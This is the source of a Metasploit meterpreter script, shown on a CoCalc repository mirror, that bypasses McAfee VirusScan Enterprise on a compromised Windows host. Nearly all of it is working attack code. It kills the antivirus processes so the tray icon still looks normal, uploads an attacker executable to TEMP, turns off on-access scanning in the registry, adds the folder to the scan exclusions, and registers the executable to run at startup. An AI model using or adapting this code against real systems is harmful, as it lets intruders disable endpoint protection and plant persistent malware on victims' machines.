CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/scripts/meterpreter/virusscan_bypass.rb
Views: 1904
1
##

2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.

3
# If you'd like to improve this script, please try to port it as a post

4
# module instead. Thank you.

5
##

6


7


8
# Meterpreter script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes in magic

9
# order which keeps VirusScan icon visible at system tray without disabled sign on it.

10
# Additionally it lets you disable On Access Scanner from registry, upload your detectable

11
# binary to TEMP folder, add that folder to the VirusScan exclusion list and CurrentVersion\Run

12
# registry key. (Requires administrator privilege. Tested on XP SP3)

13
#

14
# Credits: hdm, jduck, Jerome Athias (borrowed some of their codes)

15
#

16
# Provided by: Mert SARICA - mert.sarica [@] gmail.com - http://www.mertsarica.com

17


18
session = client

19
@@exec_opts = Rex::Parser::Arguments.new(

20
  "-h" => [ false,"Help menu." ],

21
  "-k" => [ false,"Only kills VirusScan processes"],

22
  "-e" => [ true,"Executable to upload to target host. (modifies registry and exclusion list)" ]

23
)

24


25
################## function declaration Declarations ##################

26
def usage()

27
  print_line "\nAuthor: Mert SARICA (mert.sarica [@] gmail.com) \t\tWeb: http://www.mertsarica.com"

28
  print_line "----------------------------------------------------------------------------------------------"

29
  print_line "Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder adds it"

30
  print_line "to exclusion list and set it to run at startup. (Requires administrator privilege)"

31
  print_line "----------------------------------------------------------------------------------------------"

32
  print_line(@@exec_opts.usage)

33
end

34


35
@path = ""

36
@location = ""

37


38
def upload(session,file,trgloc)

39
  if not ::File.exist?(file)

40
    raise "File to Upload does not exist!"

41
  else

42
    @location = session.sys.config.getenv('TEMP')

43
    begin

44
      ext = file.scan(/\S*(.exe)/i)

45
      if ext.join == ".exe"

46
        fileontrgt = "#{@location}\\MS#{rand(100)}.exe"

47
      else

48
        fileontrgt = "#{@location}\\MS#{rand(100)}#{ext}"

49
      end

50
      @path = fileontrgt

51
      print_status("Uploading #{file}....")

52
      session.fs.file.upload_file("#{fileontrgt}","#{file}")

53
      print_status("Uploaded as #{fileontrgt}")

54
    rescue ::Exception => e

55
      print_status("Error uploading file #{file}: #{e.class} #{e}")

56
    end

57
  end

58
  return fileontrgt

59
end

60


61
#parsing of Options

62
file = ""

63
helpcall = 0

64
killonly = 0

65
@@exec_opts.parse(args) { |opt, idx, val|

66
  case opt

67
  when "-e"

68
    file = val || ""

69
  when "-h"

70
    helpcall = 1

71
  when "-k"

72
    killonly = 1

73
  end

74


75
}

76


77
if killonly == 0

78
  if file == ""

79
    usage

80
    raise Rex::Script::Completed

81
  end

82
end

83


84
# Magic kill order :)

85
avs = %W{

86
  shstat.exe

87
  engineserver.exe

88
  frameworkservice.exe

89
  naprdmgr.exe

90
  mctray.exe

91
  mfeann.exe

92
  vstskmgr.exe

93
  mcshield.exe

94
}

95


96
av = 0

97


98
plist = client.sys.process.get_processes()

99
plist.each do |x|

100
  if (avs.index(x['name'].downcase))

101
    av = av + 1

102
  end

103
end

104


105


106
if av > 6

107
  print_status("VirusScan Enterprise v8.7.0i+ is running...")

108
else

109
  print_status("VirusScan Enterprise v8.7.0i+ is not running!")

110
  raise Rex::Script::Completed

111
end

112


113
target_pid = nil

114
target ||= "mfevtps.exe"

115


116
print_status("Migrating to #{target}...")

117


118
# Get the target process pid

119
target_pid = client.sys.process[target]

120


121
if not target_pid

122
  print_error("Could not access the target process")

123
  raise Rex::Script::Completed

124
end

125


126
print_status("Migrating into process ID #{target_pid}")

127
client.core.migrate(target_pid)

128


129
target_pid = nil

130


131
if killonly == 1

132
  avs.each do |x|

133
    # Get the target process pid

134
    target_pid = client.sys.process[x]

135
    print_status("Killing off #{x}...")

136
    client.sys.process.kill(target_pid)

137
  end

138
else

139
  avs.each do |x|

140
    # Get the target process pid

141
    target_pid = client.sys.process[x]

142
    print_status("Killing off #{x}...")

143
    client.sys.process.kill(target_pid)

144
  end

145


146
  # Upload it

147
  exec = upload(session,file,"")

148


149
  # Initiailze vars

150
  key   = nil

151
  value = nil

152
  data  = nil

153
  type  = nil

154


155
  # Mcafee registry key

156
  key = 'HKLM\Software\Mcafee\VSCore\On Access Scanner\MCShield\Configuration\Default'

157


158
  # Split the key into its parts

159
  root_key, base_key = client.sys.registry.splitkey(key)

160


161
  # Disable when writing to disk option

162
  value = "bScanIncoming"

163
  data = 0

164
  type = "REG_DWORD"

165
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)

166
  open_key.set_value(value, client.sys.registry.type2str(type), data)

167
  print_status("Successful set #{key} -> #{value} to #{data}.")

168


169
  # Disable when reading from disk option

170
  value = "bScanOutgoing"

171
  data = 0

172
  type = "REG_DWORD"

173
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)

174
  open_key.set_value(value, client.sys.registry.type2str(type), data)

175
  print_status("Successful set #{key} -> #{value} to #{data}.")

176


177
  # Disable detection of unwanted programs

178
  value = "ApplyNVP"

179
  data = 0

180
  type = "REG_DWORD"

181
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)

182
  open_key.set_value(value, client.sys.registry.type2str(type), data)

183
  print_status("Successful set #{key} -> #{value} to #{data}.")

184


185
  # Increase the number of excluded items

186
  value = "NumExcludeItems"

187
  data = 1

188
  type = "REG_DWORD"

189
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)

190
  open_key.set_value(value, client.sys.registry.type2str(type), data)

191
  print_status("Successful set #{key} -> #{value} to #{data}.")

192


193
  # Add executable to excluded item folder

194
  value = "ExcludedItem_0"

195
  data = "3|3|" + @location

196
  type = "REG_SZ"

197
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)

198
  open_key.set_value(value, client.sys.registry.type2str(type), data)

199
  print_status("Successful set #{key} -> #{value} to #{data}.")

200


201
  # Set registry to run executable at startup

202
  key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'

203
  # Split the key into its parts

204
  root_key, base_key = client.sys.registry.splitkey(key)

205
  value = "MS"

206
  data = @path

207
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)

208
  open_key.set_value(value, client.sys.registry.type2str(type), data)

209
  print_status("Successful set #{key} -> #{value} to #{data}.")

210
end

211


212
print_status("Finished!")

213


214